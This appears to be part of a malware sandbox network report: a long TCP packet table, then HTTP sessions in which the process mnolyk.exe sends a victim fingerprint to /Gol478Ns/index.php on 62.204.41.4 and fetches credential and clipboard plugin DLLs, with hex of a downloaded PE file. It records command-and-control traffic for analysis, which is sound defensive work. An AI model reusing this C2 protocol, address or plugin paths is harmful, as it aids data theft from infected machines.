Feb 7, 2023 20:00:28.438319921 CET	80	50441	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.438473940 CET	50441	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.549705029 CET	50441	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.551075935 CET	50442	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.610559940 CET	80	50441	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.610645056 CET	50441	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.612622976 CET	80	50442	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.612806082 CET	50442	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.613579988 CET	50442	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.674566984 CET	80	50442	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.676589966 CET	80	50442	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.676764965 CET	50442	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.784224987 CET	50442	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.785882950 CET	50443	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.846231937 CET	80	50442	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.846386909 CET	50442	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.848227024 CET	80	50443	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.848331928 CET	50443	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.848844051 CET	50443	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.912549973 CET	80	50443	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.917032957 CET	80	50443	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.917176962 CET	50443	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.033796072 CET	50443	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.034638882 CET	50444	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.094861031 CET	80	50443	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.094958067 CET	50443	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.095125914 CET	80	50444	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.095223904 CET	50444	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.095830917 CET	50444	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.156694889 CET	80	50444	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.163250923 CET	80	50444	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.163372040 CET	50444	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.283265114 CET	50444	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.284162998 CET	50445	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.344055891 CET	80	50444	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.344155073 CET	50444	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.348129034 CET	80	50445	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.348251104 CET	50445	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.348634005 CET	50445	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.411550999 CET	80	50445	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.415103912 CET	80	50445	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.415174007 CET	50445	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.518068075 CET	50445	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.518915892 CET	50446	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.580693007 CET	80	50446	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.580847025 CET	50446	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.580988884 CET	80	50445	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.581119061 CET	50445	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.582178116 CET	50446	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.645060062 CET	80	50446	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.646863937 CET	80	50446	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.646970034 CET	50446	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.753305912 CET	50446	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.754079103 CET	50447	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.815332890 CET	80	50446	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.815475941 CET	50446	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.815934896 CET	80	50447	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.816756964 CET	50447	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.817137957 CET	50447	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:29.880518913 CET	80	50447	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.883445978 CET	80	50447	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:29.885963917 CET	50447	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.004965067 CET	50447	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.012494087 CET	50448	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.067460060 CET	80	50447	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.069497108 CET	50447	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.073501110 CET	80	50448	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.077526093 CET	50448	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.077914000 CET	50448	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.138844967 CET	80	50448	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.143573046 CET	80	50448	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.145541906 CET	50448	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.253037930 CET	50448	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.254046917 CET	50449	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.316384077 CET	80	50448	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.316541910 CET	50448	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.317315102 CET	80	50449	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.317482948 CET	50449	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.317848921 CET	50449	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.381622076 CET	80	50449	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.383908033 CET	80	50449	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.384078979 CET	50449	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.487442970 CET	50449	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.488401890 CET	50450	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.548341990 CET	80	50449	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.548705101 CET	80	50450	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.548774958 CET	50449	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.548903942 CET	50450	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.549659967 CET	50450	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.609906912 CET	80	50450	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.614676952 CET	80	50450	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.617527962 CET	50450	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.742760897 CET	50450	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.743693113 CET	50451	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.803885937 CET	80	50450	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.804047108 CET	50450	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.804286957 CET	80	50451	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.804398060 CET	50451	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.804845095 CET	50451	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.866925955 CET	80	50451	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.868607044 CET	80	50451	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:30.868725061 CET	50451	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.974046946 CET	50451	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:30.976286888 CET	50452	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.035087109 CET	80	50451	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.035181046 CET	50451	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.038903952 CET	80	50452	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.039118052 CET	50452	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.039413929 CET	50452	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.100184917 CET	80	50452	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.103657961 CET	80	50452	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.103809118 CET	50452	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.205260038 CET	50452	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.205832005 CET	50453	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.267680883 CET	80	50452	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.267749071 CET	80	50453	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.267813921 CET	50452	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.267880917 CET	50453	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.268227100 CET	50453	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.330302954 CET	80	50453	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.332623005 CET	80	50453	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.332788944 CET	50453	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.440079927 CET	50453	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.441009998 CET	50454	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.500580072 CET	80	50453	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.500739098 CET	50453	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.503628969 CET	80	50454	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.503757000 CET	50454	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.504096031 CET	50454	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.566392899 CET	80	50454	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.569017887 CET	80	50454	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.569206953 CET	50454	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.674503088 CET	50454	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.675620079 CET	50455	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.735385895 CET	80	50455	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.735707045 CET	50455	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.736850977 CET	50455	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.737015963 CET	80	50454	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.737117052 CET	50454	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.796849012 CET	80	50455	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.799894094 CET	80	50455	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.800050020 CET	50455	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.916708946 CET	50455	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.917534113 CET	50457	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.977555990 CET	80	50455	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.977669001 CET	50455	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.981108904 CET	80	50457	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:31.981206894 CET	50457	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:31.981578112 CET	50457	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.044234037 CET	80	50457	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.048803091 CET	80	50457	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.048924923 CET	50457	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.159656048 CET	50457	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.160465002 CET	50458	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.221738100 CET	80	50458	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.221827030 CET	50458	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.222882986 CET	80	50457	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.222963095 CET	50457	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.245201111 CET	50458	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.305763006 CET	80	50458	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.309118032 CET	80	50458	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.309221983 CET	50458	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.424803972 CET	50458	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.425606012 CET	50459	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.487833977 CET	80	50458	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.487931967 CET	50458	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.490032911 CET	80	50459	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.490577936 CET	50459	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.490578890 CET	50459	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.553141117 CET	80	50459	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.555351019 CET	80	50459	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.555457115 CET	50459	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.681472063 CET	50459	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.682703018 CET	50460	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.742880106 CET	80	50460	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.743089914 CET	80	50459	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.743211031 CET	50459	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.743654013 CET	50460	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.743841887 CET	50460	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.803426027 CET	80	50460	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.806299925 CET	80	50460	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.806857109 CET	50460	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.926424026 CET	50460	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.927062035 CET	50461	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.988764048 CET	80	50460	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.988940001 CET	80	50461	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:32.989006996 CET	50460	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.989073992 CET	50461	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:32.989437103 CET	50461	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.052145004 CET	80	50461	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.055789948 CET	80	50461	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.055941105 CET	50461	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.160975933 CET	50461	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.161815882 CET	50462	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.221266031 CET	80	50462	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.221847057 CET	50462	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.222234964 CET	50462	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.223350048 CET	80	50461	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.223500013 CET	50461	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.282752991 CET	80	50462	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.285778999 CET	80	50462	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.287599087 CET	50462	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.395531893 CET	50462	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.397545099 CET	50463	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.456727982 CET	80	50462	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.458035946 CET	80	50463	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.458194017 CET	50462	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.458228111 CET	50463	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.458703995 CET	50463	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.521022081 CET	80	50463	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.523138046 CET	80	50463	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.524276972 CET	50463	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.633861065 CET	50463	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.635440111 CET	50464	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.694616079 CET	80	50463	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.694725037 CET	50463	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.698579073 CET	80	50464	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.698796034 CET	50464	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.699107885 CET	50464	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.761502028 CET	80	50464	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.763662100 CET	80	50464	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.763839006 CET	50464	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.878524065 CET	50464	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.879545927 CET	50465	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.940990925 CET	80	50464	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.941021919 CET	80	50465	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:33.941200018 CET	50464	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.941261053 CET	50465	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:33.942200899 CET	50465	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.003725052 CET	80	50465	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.005801916 CET	80	50465	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.005925894 CET	50465	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.111665964 CET	50465	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.112360954 CET	50466	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.173342943 CET	80	50465	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.173541069 CET	50465	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.174829960 CET	80	50466	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.174961090 CET	50466	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.175410986 CET	50466	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.237963915 CET	80	50466	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.241656065 CET	80	50466	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.241785049 CET	50466	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.346323013 CET	50466	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.347318888 CET	50467	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.409037113 CET	80	50466	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.409137011 CET	80	50467	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.409173012 CET	50466	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.409243107 CET	50467	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.410743952 CET	50467	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.472909927 CET	80	50467	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.475270033 CET	80	50467	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.475399971 CET	50467	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.581931114 CET	50467	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.583597898 CET	50468	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.643598080 CET	80	50467	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.643774986 CET	50467	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.645095110 CET	80	50468	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.645318031 CET	50468	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.647098064 CET	50468	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.709438086 CET	80	50468	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.711626053 CET	80	50468	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.711843967 CET	50468	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.814940929 CET	50468	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.815769911 CET	50469	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.877574921 CET	80	50468	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.877712965 CET	50468	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.878879070 CET	80	50469	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.878981113 CET	50469	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.879329920 CET	50469	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:34.943434000 CET	80	50469	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.946151018 CET	80	50469	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:34.946289062 CET	50469	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:35.049449921 CET	50469	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:35.050112963 CET	50470	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:35.113023996 CET	80	50470	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:35.113053083 CET	80	50469	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:35.113193035 CET	50469	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:35.113671064 CET	50470	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:35.113671064 CET	50470	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:35.175760984 CET	80	50470	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:35.180619955 CET	80	50470	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:35.180741072 CET	50470	80	192.168.2.5	62.204.41.4

HTTP Request Dependency Graph

62.204.41.4

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49698	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:03.625298977 CET	0	OUT	GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
Feb 7, 2023 19:57:03.684715986 CET	1	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:03 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49697	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:03.625893116 CET	0	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:03.692217112 CET	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0
Feb 7, 2023 19:57:03.702605963 CET	1	OUT	GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
Feb 7, 2023 19:57:03.765212059 CET	3	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:03 GMT Content-Type: application/octet-stream Content-Length: 91136 Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT Connection: keep-alive ETag: "63dd4219-16400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 